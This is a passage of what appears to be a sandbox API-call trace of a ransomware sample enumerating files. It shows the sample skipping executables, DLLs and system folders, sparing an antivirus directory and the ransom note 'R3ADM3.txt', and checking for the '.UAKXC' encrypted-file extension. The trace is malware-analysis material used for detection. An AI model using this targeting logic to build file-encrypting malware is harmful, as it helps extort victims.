ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0158.771] lstrcmpW (lpString1="DBGHELP.DLL", lpString2=".") returned 1 [0158.771] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="..") returned 1 [0158.771] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".UAKXC") returned 0x0 [0158.771] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".exe") returned 0x0 [0158.771] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".dll") returned=".DLL" [0158.771] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2630ae0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DBSHARE.DLL", cAlternateFileName="")) returned 1 [0158.771] lstrcmpW (lpString1="DBSHARE.DLL", lpString2=".") returned 1 [0158.771] lstrcmpW (lpString1="DBSHARE.DLL", lpString2="..") returned 1 [0158.771] StrStrIW (lpFirst="DBSHARE.DLL", lpSrch=".UAKXC") returned 0x0 [0158.771] StrStrIW (lpFirst="DBSHARE.DLL", lpSrch=".exe") returned 0x0 [0158.772] StrStrIW (lpFirst="DBSHARE.DLL", lpSrch=".dll") returned=".DLL" [0158.772] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2904500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x137b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DBWIZ.DLL", cAlternateFileName="")) returned 1 [0158.772] lstrcmpW (lpString1="DBWIZ.DLL", lpString2=".") returned 1 [0158.772] lstrcmpW (lpString1="DBWIZ.DLL", lpString2="..") returned 1 [0158.772] StrStrIW (lpFirst="DBWIZ.DLL", lpSrch=".UAKXC") returned 0x0 [0158.772] StrStrIW (lpFirst="DBWIZ.DLL", lpSrch=".exe") returned 0x0 [0158.772] StrStrIW (lpFirst="DBWIZ.DLL", lpSrch=".dll") returned=".DLL" [0158.772] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3242fa00, ftCreationTime.dwHighDateTime=0x1cb7017, ftLastAccessTime.dwLowDateTime=0xd2a812c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3242fa00, ftLastWriteTime.dwHighDateTime=0x1cb7017, nFileSizeHigh=0x0, nFileSizeLow=0x1a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGRMLNCH.DLL", cAlternateFileName="")) returned 1 [0158.772] lstrcmpW (lpString1="DGRMLNCH.DLL", lpString2=".") returned 1 [0158.772] lstrcmpW (lpString1="DGRMLNCH.DLL", lpString2="..") returned 1 [0158.772] StrStrIW (lpFirst="DGRMLNCH.DLL", lpSrch=".UAKXC") returned 0x0 [0158.772] StrStrIW (lpFirst="DGRMLNCH.DLL", lpSrch=".exe") returned 0x0 [0158.772] StrStrIW (lpFirst="DGRMLNCH.DLL", lpSrch=".dll") returned=".DLL" [0158.772] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1e9b800, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x607d2d50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1e9b800, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x1c770, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DLGSETP.DLL", cAlternateFileName="")) returned 1 [0158.772] lstrcmpW (lpString1="DLGSETP.DLL", lpString2=".") returned 1 [0158.772] lstrcmpW (lpString1="DLGSETP.DLL", lpString2="..") returned 1 [0158.772] StrStrIW (lpFirst="DLGSETP.DLL", lpSrch=".UAKXC") returned 0x0 [0158.772] StrStrIW (lpFirst="DLGSETP.DLL", lpSrch=".exe") returned 0x0 [0158.772] StrStrIW (lpFirst="DLGSETP.DLL", lpSrch=".dll") returned=".DLL" [0158.772] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3382f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e3382f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e3382f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Parts", cAlternateFileName="DOCUME~1")) returned 1 [0158.772] lstrcmpW (lpString1="Document Parts", lpString2=".") returned 1 [0158.772] lstrcmpW (lpString1="Document Parts", lpString2="..") returned 1 [0158.772] StrStrIW (lpFirst="Document Parts", lpSrch="tmp") returned 0x0 [0158.772] StrStrIW (lpFirst="Document Parts", lpSrch="winnt") returned 0x0 [0158.772] StrStrIW (lpFirst="Document Parts", lpSrch="temp") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="thumb") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="$Recycle.Bin") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="System Volume Information") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="Boot") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="Windows") returned 0x0 [0158.773] StrStrIW (lpFirst="Document Parts", lpSrch="Trend Micro") returned 0x0 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ac0 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.773] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.773] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.773] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0ac0 | out: hHeap=0xea0000) returned 1 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ac0 [0158.773] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.773] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.773] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff0d00, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xcfd6d220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6ff0d00, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x1acf78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0158.773] lstrcmpW (lpString1="DRILLDWN.DLL", lpString2=".") returned 1 [0158.773] lstrcmpW (lpString1="DRILLDWN.DLL", lpString2="..") returned 1 [0158.773] StrStrIW (lpFirst="DRILLDWN.DLL", lpSrch=".UAKXC") returned 0x0 [0158.773] StrStrIW (lpFirst="DRILLDWN.DLL", lpSrch=".exe") returned 0x0 [0158.773] StrStrIW (lpFirst="DRILLDWN.DLL", lpSrch=".dll") returned=".DLL" [0158.773] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3357b00, ftCreationTime.dwHighDateTime=0x1cba075, ftLastAccessTime.dwLowDateTime=0xcfdb94e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa3357b00, ftLastWriteTime.dwHighDateTime=0x1cba075, nFileSizeHigh=0x0, nFileSizeLow=0x36160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWGCNV.DLL", cAlternateFileName="")) returned 1 [0158.773] lstrcmpW (lpString1="DWGCNV.DLL", lpString2=".") returned 1 [0158.773] lstrcmpW (lpString1="DWGCNV.DLL", lpString2="..") returned 1 [0158.773] StrStrIW (lpFirst="DWGCNV.DLL", lpSrch=".UAKXC") returned 0x0 [0158.774] StrStrIW (lpFirst="DWGCNV.DLL", lpSrch=".exe") returned 0x0 [0158.774] StrStrIW (lpFirst="DWGCNV.DLL", lpSrch=".dll") returned=".DLL" [0158.774] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd00b3060, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x8f3d68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWGDP.DLL", cAlternateFileName="")) returned 1 [0158.774] lstrcmpW (lpString1="DWGDP.DLL", lpString2=".") returned 1 [0158.774] lstrcmpW (lpString1="DWGDP.DLL", lpString2="..") returned 1 [0158.774] StrStrIW (lpFirst="DWGDP.DLL", lpSrch=".UAKXC") returned 0x0 [0158.774] StrStrIW (lpFirst="DWGDP.DLL", lpSrch=".exe") returned 0x0 [0158.774] StrStrIW (lpFirst="DWGDP.DLL", lpSrch=".dll") returned=".DLL" [0158.774] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2f6a020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x30968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDITOR.EXE", cAlternateFileName="")) returned 1 [0158.774] lstrcmpW (lpString1="EDITOR.EXE", lpString2=".") returned 1 [0158.774] lstrcmpW (lpString1="EDITOR.EXE", lpString2="..") returned 1 [0158.774] StrStrIW (lpFirst="EDITOR.EXE", lpSrch=".UAKXC") returned 0x0 [0158.774] StrStrIW (lpFirst="EDITOR.EXE", lpSrch=".exe") returned=".EXE" [0158.774] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2f90180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xad88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDITORS.DLL", cAlternateFileName="")) returned 1 [0158.774] lstrcmpW (lpString1="EDITORS.DLL", lpString2=".") returned 1 [0158.774] lstrcmpW (lpString1="EDITORS.DLL", lpString2="..") returned 1 [0158.774] StrStrIW (lpFirst="EDITORS.DLL", lpSrch=".UAKXC") returned 0x0 [0158.774] StrStrIW (lpFirst="EDITORS.DLL", lpSrch=".exe") returned 0x0 [0158.774] StrStrIW (lpFirst="EDITORS.DLL", lpSrch=".dll") returned=".DLL" [0158.774] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2fdc440, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x3f988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ELEMENTS.DLL", cAlternateFileName="")) returned 1 [0158.774] lstrcmpW (lpString1="ELEMENTS.DLL", lpString2=".") returned 1 [0158.774] lstrcmpW (lpString1="ELEMENTS.DLL", lpString2="..") returned 1 [0158.775] StrStrIW (lpFirst="ELEMENTS.DLL", lpSrch=".UAKXC") returned 0x0 [0158.775] StrStrIW (lpFirst="ELEMENTS.DLL", lpSrch=".exe") returned 0x0 [0158.775] StrStrIW (lpFirst="ELEMENTS.DLL", lpSrch=".dll") returned=".DLL" [0158.775] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd30c0c80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x237a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ELEMUTIL.DLL", cAlternateFileName="")) returned 1 [0158.775] lstrcmpW (lpString1="ELEMUTIL.DLL", lpString2=".") returned 1 [0158.775] lstrcmpW (lpString1="ELEMUTIL.DLL", lpString2="..") returned 1 [0158.775] StrStrIW (lpFirst="ELEMUTIL.DLL", lpSrch=".UAKXC") returned 0x0 [0158.775] StrStrIW (lpFirst="ELEMUTIL.DLL", lpSrch=".exe") returned 0x0 [0158.775] StrStrIW (lpFirst="ELEMUTIL.DLL", lpSrch=".dll") returned=".DLL" [0158.775] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31ae500, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe31ae500, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x25b80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EMABLT32.DLL", cAlternateFileName="")) returned 1 [0158.775] lstrcmpW (lpString1="EMABLT32.DLL", lpString2=".") returned 1 [0158.775] lstrcmpW (lpString1="EMABLT32.DLL", lpString2="..") returned 1 [0158.775] StrStrIW (lpFirst="EMABLT32.DLL", lpSrch=".UAKXC") returned 0x0 [0158.775] StrStrIW (lpFirst="EMABLT32.DLL", lpSrch=".exe") returned 0x0 [0158.775] StrStrIW (lpFirst="EMABLT32.DLL", lpSrch=".dll") returned=".DLL" [0158.775] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0x60903850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0x206fb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EMSMDB32.DLL", cAlternateFileName="")) returned 1 [0158.775] lstrcmpW (lpString1="EMSMDB32.DLL", lpString2=".") returned 1 [0158.775] lstrcmpW (lpString1="EMSMDB32.DLL", lpString2="..") returned 1 [0158.775] StrStrIW (lpFirst="EMSMDB32.DLL", lpSrch=".UAKXC") returned 0x0 [0158.775] StrStrIW (lpFirst="EMSMDB32.DLL", lpSrch=".exe") returned 0x0 [0158.775] StrStrIW (lpFirst="EMSMDB32.DLL", lpSrch=".dll") returned=".DLL" [0158.775] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5807500, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x609299b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5807500, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x46c86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENGDIC.DAT", cAlternateFileName="")) returned 1 [0158.775] lstrcmpW (lpString1="ENGDIC.DAT", lpString2=".") returned 1 [0158.775] lstrcmpW (lpString1="ENGDIC.DAT", lpString2="..") returned 1 [0158.775] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".UAKXC") returned 0x0 [0158.775] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".exe") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".dll") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".lnk") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".sys") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch=".msi") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGDIC.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ae8 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0ae8 | out: hHeap=0xea0000) returned 1 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0ae8 [0158.776] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32f20 [0158.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.776] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5807500, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5807500, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x8578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENGIDX.DAT", cAlternateFileName="")) returned 1 [0158.776] lstrcmpW (lpString1="ENGIDX.DAT", lpString2=".") returned 1 [0158.776] lstrcmpW (lpString1="ENGIDX.DAT", lpString2="..") returned 1 [0158.776] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".UAKXC") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".exe") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".dll") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".lnk") returned 0x0 [0158.776] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".sys") returned 0x0 [0158.777] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch=".msi") returned 0x0 [0158.777] StrStrIW (lpFirst="ENGIDX.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b10 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.777] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.777] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.777] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0b10 | out: hHeap=0xea0000) returned 1 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b10 [0158.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32f98 [0158.777] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.777] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.778] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc59cb00, ftCreationTime.dwHighDateTime=0x1c3e388, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcc59cb00, ftLastWriteTime.dwHighDateTime=0x1c3e388, nFileSizeHigh=0x0, nFileSizeLow=0x4c22c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENGLISH.LNG", cAlternateFileName="")) returned 1 [0158.778] lstrcmpW (lpString1="ENGLISH.LNG", lpString2=".") returned 1 [0158.778] lstrcmpW (lpString1="ENGLISH.LNG", lpString2="..") returned 1 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".UAKXC") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".exe") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".dll") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".lnk") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".sys") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch=".msi") returned 0x0 [0158.778] StrStrIW (lpFirst="ENGLISH.LNG", lpSrch="R3ADM3.txt") returned 0x0 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b38 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.778] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.778] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.778] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0b38 | out: hHeap=0xea0000) returned 1 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ea8 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0b38 [0158.778] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef96c8 [0158.778] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xea0000) returned 1 [0158.778] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.778] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x609299b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0xf380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EntityDataHandler.dll", cAlternateFileName="ENTITY~2.DLL")) returned 1 [0158.778] lstrcmpW (lpString1="EntityDataHandler.dll", lpString2=".") returned 1 [0158.778] lstrcmpW (lpString1="EntityDataHandler.dll", lpString2="..") returned 1 [0158.779] StrStrIW (lpFirst="EntityDataHandler.dll", lpSrch=".UAKXC") returned 0x0 [0158.779] StrStrIW (lpFirst="EntityDataHandler.dll", lpSrch=".exe") returned 0x0 [0158.779] StrStrIW (lpFirst="EntityDataHandler.dll", lpSrch=".dll") returned=".dll" [0158.779] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x51fbcc50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x41980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EntityPicker.dll", cAlternateFileName="ENTITY~1.DLL")) returned 1 [0158.779] lstrcmpW (lpString1="EntityPicker.dll", lpString2=".") returned 1 [0158.779] lstrcmpW (lpString1="EntityPicker.dll", lpString2="..") returned 1 [0158.779] StrStrIW (lpFirst="EntityPicker.dll", lpSrch=".UAKXC") returned 0x0 [0158.779] StrStrIW (lpFirst="EntityPicker.dll", lpSrch=".exe") returned 0x0 [0158.779] StrStrIW (lpFirst="EntityPicker.dll", lpSrch=".dll") returned=".dll" [0158.779] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x6094fb10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x35980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENVELOPE.DLL", cAlternateFileName="")) returned 1 [0158.779] lstrcmpW (lpString1="ENVELOPE.DLL", lpString2=".") returned 1 [0158.779] lstrcmpW (lpString1="ENVELOPE.DLL", lpString2="..") returned 1 [0158.779] StrStrIW (lpFirst="ENVELOPE.DLL", lpSrch=".UAKXC") returned 0x0 [0158.779] StrStrIW 